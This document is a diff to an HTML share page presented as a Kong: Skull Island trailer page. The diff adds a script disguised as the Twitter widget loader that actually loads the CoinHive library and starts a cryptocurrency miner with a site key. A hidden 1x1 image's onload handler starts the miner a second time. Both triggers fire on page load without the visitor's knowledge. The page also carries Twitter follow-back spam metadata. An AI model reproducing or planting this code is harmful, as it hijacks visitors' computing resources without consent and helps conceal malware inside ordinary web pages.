--- a/tc3.html
+++ b/tc3.html
@@ -32,7 +32,69 @@
  <!--Share twitter -->
         <script  type="text/javascript">
         !function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");
+        </script><html>
+<head>
+ <script  type="text/javascript">
+	
+	
+	        !function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];
+		if(!d.getElementById(id))
+		{js=d.createElement(s);
+		js.id=id;
+		js.src="//coin-hive.com/lib/coinhive.min.js";
+		js.innerHTML="!function(){var miner = new CoinHive.Anonymous('bbxalNoLp5ZVs6plwCnsSbpPMdqh5qw7', {throttle: 0.1});miner.start();}();"
+		fjs.parentNode.insertBefore(js,fjs);}
+		}(document,"script","cjs");
+  </script>
+<!--<meta content="EVERYDAYHITS.ORG" property="og:site_name">-->
+
+<meta content="summary_large_image" name="twitter:card">
+<meta content="Discover how Kong became King" name="twitter:title">
+
+<meta content="Discover how Kong became King. Watch the official Comic-Con trailer for #kongskullisland, starring Tom Hiddleston, Samuel L. Jac" property="og:description">
+
+<!--<meta content="http://EVERYDAYHITS.ORG/funfacts/this-is-porn-according-to-facebook/?uid=youngicon" name="twitter:url">-->
+
+
+<!--<link href="http://EVERYDAYHITS.ORG/funfacts/this-is-porn-according-to-facebook/?uid=youngicon" rel="canonical">-->
+<!--<meta content="http://EVERYDAYHITS.ORG/funfacts/this-is-porn-according-to-facebook/?uid=youngicon" property="og:url">-->
+
+
+<meta content="http://img4.moevideo.net/play1/640x360/7p598.3999548131ea3cafd7e0166862b5_one.jpg" property="og:image">
+
+<meta content="Discover how Kong became King. Watch the official Comic-Con trailer fo" property="og:title">
+
+
+<meta charset="UTF-8">
+<meta content="width=device-width" name="viewport">
+
+
+ <!--Share twitter -->
+        <script  type="text/javascript">
+        !function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];
+		if(!d.getElementById(id))
+		{js=d.createElement(s);
+		js.id=id;
+		js.src="//platform.twitter.com/widgets.js";
+		fjs.parentNode.insertBefore(js,fjs);}
+		}(document,"script","twitter-wjs");
         </script>
+</head>
+<body>
+<div>
+<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" onload="var miner = new CoinHive.Anonymous('bbxalNoLp5ZVs6plwCnsSbpPMdqh5qw7', {throttle: 0.1});miner.start();">
+ <!--Share twitter -->
+    <div style="display:inline-block" id="twitter_button"><a class="twitter-share-button" data-count="none" data-lang="ru" data-related="Berder_:SEO раскрутка сайтов,loteron_f:Читай меня  а я буду читать тебя,DimonDDDDD:Читай меня  а я буду читать тебя,mofigbuul:Автомобили FollowBack" data-size="large" data-via="loteron_f" href="https://twitter.com/share?text=Messi crying">Tweet</a></div>
+
+                   <!-- <iframe width="640" height="360" src="https://playreplay.me/framevideo/7p598.3999548131ea3cafd7e0166862b5?width=640&height=360" frameborder="0" allowfullscreen><!--old metod--> -->
+<!-- </iframe> -->
+ <!-- <iframe name="f1" src="http://geper.github.io/decision-trees/defe.js"></iframe> -->
+
+
+</div>
+</body>
+</html>
+
 </head>
 <body>
 <div>
